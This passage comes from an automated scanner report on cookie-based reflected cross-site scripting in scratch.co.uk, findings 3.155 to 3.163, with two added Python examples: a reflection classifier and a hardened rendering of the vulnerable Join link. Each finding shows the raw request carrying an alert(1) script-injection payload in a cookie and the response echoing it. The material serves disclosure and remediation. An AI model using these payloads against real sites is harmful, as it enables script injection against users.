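The check below is an added example, not part of the XSS.CX report or of the scratch.co.uk site. Given a raw HTTP response and the canary that was appended to a cookie, it answers the three questions worth asking of findings 3.154 to 3.167: is the canary echoed unmodified, in what markup context does it land, and does a Set-Cookie header re-issue the tampered value so that it persists in the browser. The two responses embedded in it are constructed, modelled on the 3.154 exchange and on a hypothetical fixed version of it.

```python
"""Added example (not part of the XSS.CX report or the scratch.co.uk site):
classify how a canary submitted in a request cookie comes back in the raw
HTTP response.  The two responses below are constructed samples."""
import re
from urllib.parse import unquote

CANARY = 'c841f"><script>alert(1)</script>c26133aa53'

# Constructed sample modelled on the 3.154 response: raw reflection into the
# Join link plus a Set-Cookie header that re-issues the tampered value.
POISONED_RESPONSE = "\r\n".join([
    "HTTP/1.1 200 OK",
    "Content-Type: text/html",
    "Set-Cookie: affiliate=direct-173%7C193%7C214%7C243c841f%22%3E%3Cscript%3E"
    "alert%281%29%3C%2Fscript%3Ec26133aa53; expires=Wed, 15-Jun-2011 12:26:03 GMT; path=/",
    "Set-Cookie: lang=ENG; path=/",
    "",
    "<html><head><title>About</title></head><body>",
    "<a href=\"javascript:openScratch('GBP', 'ENG', 'direct-173|193|214|243" + CANARY
    + "');\" onclick=\"pageTracker._trackEvent('Join', 'Top Nav');\">Join</a>",
    "</body></html>",
])

# Constructed sample of a fixed response: value entity-encoded, cookie not re-issued.
ENCODED_RESPONSE = "\r\n".join([
    "HTTP/1.1 200 OK",
    "Content-Type: text/html",
    "",
    "<html><body>",
    "<a href=\"#\" data-affiliate=\"direct-173|193|214|243c841f&quot;&gt;&lt;script&gt;"
    "alert(1)&lt;/script&gt;c26133aa53\">Join</a>",
    "</body></html>",
])

# Attribute name and the partial value that precedes the reflection point.
ATTR_RE = re.compile(r'(\w[\w-]*)\s*=\s*"([^"]*)$')


def split_response(raw):
    """Split a raw HTTP/1.1 response into (status line, [(name, value)], body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers, body


def cookie_persists(headers, cookie_name, canary):
    """True if a Set-Cookie header re-issues cookie_name with the canary in it (URL-decoded)."""
    for name, value in headers:
        if name != "set-cookie":
            continue
        cname, _, rest = value.partition("=")
        cvalue = rest.split(";", 1)[0]
        if cname.strip() == cookie_name and canary in unquote(cvalue):
            return True
    return False


def classify_reflection(raw, cookie_name, canary):
    """Locate the canary in the body and describe its syntactic context."""
    status, headers, body = split_response(raw)
    result = {"status": status, "reflected": False, "context": "not reflected",
              "attribute": None, "in_js_url": False,
              "persisted": cookie_persists(headers, cookie_name, canary)}
    pos = body.find(canary)
    if pos == -1:
        return result
    result["reflected"] = True
    prefix = body[:pos]
    tag_open = prefix.rfind("<")
    # A '>' after the last '<' means the tag was closed: the canary sits in a text node.
    if tag_open == -1 or tag_open < prefix.rfind(">"):
        result["context"] = "text node"
        return result
    in_tag = prefix[tag_open:]
    # An odd number of double quotes since the tag opener means we are inside a "..." value.
    if in_tag.count('"') % 2 == 0:
        result["context"] = "tag (unquoted)"
        return result
    result["context"] = "double-quoted attribute"
    m = ATTR_RE.search(in_tag)
    if m:
        result["attribute"] = m.group(1)
        result["in_js_url"] = m.group(2).lstrip().lower().startswith("javascript:")
    return result


if __name__ == "__main__":
    print(classify_reflection(POISONED_RESPONSE, "affiliate", CANARY))
    print(classify_reflection(ENCODED_RESPONSE, "affiliate", CANARY))
```

To run it against a real capture, read the saved response into a string and pass the cookie name and the exact canary used. A result with `persisted` set is the cue to repeat the request with the URL-encoded cookie value the server handed back, since that is what the browser will send on the next visit.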

3.155. http://scratch.co.uk/about/ [currency cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /about/

Issue detail

The value of the currency cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 102dc"><script>alert(1)</script>b576efef7c6 was submitted in the currency cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /about/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP102dc"><script>alert(1)</script>b576efef7c6;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:29:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:29:55 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:29:55 GMT; path=/
Set-Cookie: currency=GBP102dc%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eb576efef7c6; expires=Wed, 15-Jun-2011 12:29:55 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:29:55 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 13003

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP102dc"><script>alert(1)</script>b576efef7c6', 'ENG', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.156. http://scratch.co.uk/about/ [lang cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /about/

Issue detail

The value of the lang cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f717"><script>alert(1)</script>9b4eec3d242 was submitted in the lang cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /about/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG2f717"><script>alert(1)</script>9b4eec3d242; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:29:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:29:13 GMT; path=/
Set-Cookie: lang=ENG2f717%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E9b4eec3d242; expires=Wed, 15-Jun-2011 12:29:13 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:29:13 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:29:13 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 13112

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENG2f717"><script>alert(1)</script>9b4eec3d242', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...
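The three /about/ findings above are one defect: the top-navigation Join link is built by concatenating the currency, lang and affiliate cookies into a javascript: href. The site runs PHP (X-Powered-By: PHP/5.2.9); what follows is an added Python model of that sink, not the site's code, with the unsafe concatenation beside a hardened rendering. The allow-lists, the default values and the data-attribute layout are assumptions, since the application's accepted values are not shown in the report.

```python
"""Added example (not the site's code): a Python model of the Join-link sink
seen in 3.154-3.156, with the unsafe concatenation beside a hardened rendering.
Allow-lists, defaults and the data-* attribute layout are assumptions."""
import html
import re

ALLOWED_CURRENCIES = {"GBP", "EUR", "USD"}   # assumed set of accepted currencies
ALLOWED_LANGS = {"ENG", "SWE", "GER"}        # assumed set of accepted languages
# Shape of the affiliate value seen in the report: a token, then |-separated numeric ids.
AFFILIATE_RE = re.compile(r"^[A-Za-z0-9-]+(\|[0-9]+)*$")
DEFAULTS = {"currency": "GBP", "lang": "ENG", "affiliate": "direct"}   # assumed


def render_join_link_vulnerable(currency, lang, affiliate):
    """The sink as observed: cookie values dropped verbatim into a javascript: href."""
    return ("<a href=\"javascript:openScratch('%s', '%s', '%s');\" "
            "onclick=\"pageTracker._trackEvent('Join', 'Top Nav');\">Join</a>"
            % (currency, lang, affiliate))


def validate(currency, lang, affiliate):
    """Allow-list validation: anything outside the expected shape falls back to a default
    rather than being 'sanitized', because two of the three values are enumerations."""
    return (
        currency if currency in ALLOWED_CURRENCIES else DEFAULTS["currency"],
        lang if lang in ALLOWED_LANGS else DEFAULTS["lang"],
        affiliate if AFFILIATE_RE.match(affiliate) else DEFAULTS["affiliate"],
    )


def render_join_link_hardened(currency, lang, affiliate):
    """Validate, then carry the values in HTML-attribute-encoded data-* attributes for a
    static click handler to read, instead of assembling code inside a javascript: URL.
    Matching client side (not shown): read e.currentTarget.dataset.currency etc. in a
    click listener on .join-link and call openScratch with those values."""
    currency, lang, affiliate = validate(currency, lang, affiliate)
    attrs = " ".join(
        'data-%s="%s"' % (k, html.escape(v, quote=True))
        for k, v in (("currency", currency), ("lang", lang), ("affiliate", affiliate))
    )
    return '<a href="#" class="join-link" %s>Join</a>' % attrs


if __name__ == "__main__":
    payload = "direct-173|193|214|243" + 'c841f"><script>alert(1)</script>c26133aa53'
    print(render_join_link_vulnerable("GBP", "ENG", payload))
    print(render_join_link_hardened("GBP", "ENG", payload))
```

Output encoding alone is a poor fit for this sink: before a javascript: URL is executed the browser entity-decodes the attribute value and then percent-decodes the URL, so a value that survives HTML escaping can still break a JavaScript string literal. Validating against the expected shape and moving the data out of the code string removes both decoding steps from the attack surface.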

3.157. http://scratch.co.uk/contact/ [affiliate cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /contact/

Issue detail

The value of the affiliate cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94bc4"><script>alert(1)</script>062cf6e61a2 was submitted in the affiliate cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /contact/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C24394bc4"><script>alert(1)</script>062cf6e61a2; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:26:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C24394bc4%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E062cf6e61a2; expires=Wed, 15-Jun-2011 12:26:08 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:26:08 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:26:08 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:26:08 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 15000

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENG', 'direct-173|193|214|24394bc4"><script>alert(1)</script>062cf6e61a2');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.158. http://scratch.co.uk/contact/ [currency cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /contact/

Issue detail

The value of the currency cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fc52"><script>alert(1)</script>4e4316f61d0 was submitted in the currency cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /contact/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP3fc52"><script>alert(1)</script>4e4316f61d0;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:30:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:30:37 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:30:37 GMT; path=/
Set-Cookie: currency=GBP3fc52%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E4e4316f61d0; expires=Wed, 15-Jun-2011 12:30:37 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:30:37 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 14998

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP3fc52"><script>alert(1)</script>4e4316f61d0', 'ENG', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.159. http://scratch.co.uk/contact/ [lang cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /contact/

Issue detail

The value of the lang cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7cf9c"><script>alert(1)</script>10570ae66c1 was submitted in the lang cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /contact/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG7cf9c"><script>alert(1)</script>10570ae66c1; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:30:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:30:11 GMT; path=/
Set-Cookie: lang=ENG7cf9c%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E10570ae66c1; expires=Wed, 15-Jun-2011 12:30:11 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:30:11 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:30:11 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 15000

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENG7cf9c"><script>alert(1)</script>10570ae66c1', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.160. http://scratch.co.uk/help/ [affiliate cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /help/

Issue detail

The value of the affiliate cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9f4c"><script>alert(1)</script>eaf4b62400f was submitted in the affiliate cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /help/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243c9f4c"><script>alert(1)</script>eaf4b62400f; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:25:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243c9f4c%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eeaf4b62400f; expires=Wed, 15-Jun-2011 12:25:46 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:46 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:25:46 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:46 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 11402

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENG', 'direct-173|193|214|243c9f4c"><script>alert(1)</script>eaf4b62400f');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.161. http://scratch.co.uk/help/ [currency cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /help/

Issue detail

The value of the currency cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b813a"><script>alert(1)</script>e452f3eaa1a was submitted in the currency cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /help/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBPb813a"><script>alert(1)</script>e452f3eaa1a;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:30:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:30:08 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:30:08 GMT; path=/
Set-Cookie: currency=GBPb813a%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ee452f3eaa1a; expires=Wed, 15-Jun-2011 12:30:08 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:30:08 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 11400

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBPb813a"><script>alert(1)</script>e452f3eaa1a', 'ENG', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.162. http://scratch.co.uk/help/ [lang cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /help/

Issue detail

The value of the lang cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1ac7"><script>alert(1)</script>f16dba27792 was submitted in the lang cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /help/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENGc1ac7"><script>alert(1)</script>f16dba27792; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:29:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:29:23 GMT; path=/
Set-Cookie: lang=ENGc1ac7%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ef16dba27792; expires=Wed, 15-Jun-2011 12:29:23 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:29:23 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:29:23 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 11402

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENGc1ac7"><script>alert(1)</script>f16dba27792', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.163. http://scratch.co.uk/help/deposit/methods/ [affiliate cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /help/deposit/methods/

Issue detail

The value of the affiliate cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b792"><script>alert(1)</script>7be29cfe53a was submitted in the affiliate cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /help/deposit/methods/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C2434b792"><script>alert(1)</script>7be29cfe53a; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:26:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C2434b792%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E7be29cfe53a; expires=Wed, 15-Jun-2011 12:26:03 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:26:03 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:26:03 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:26:03 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 18431

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENG', 'direct-173|193|214|2434b792"><script>alert(1)</script>7be29cfe53a');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

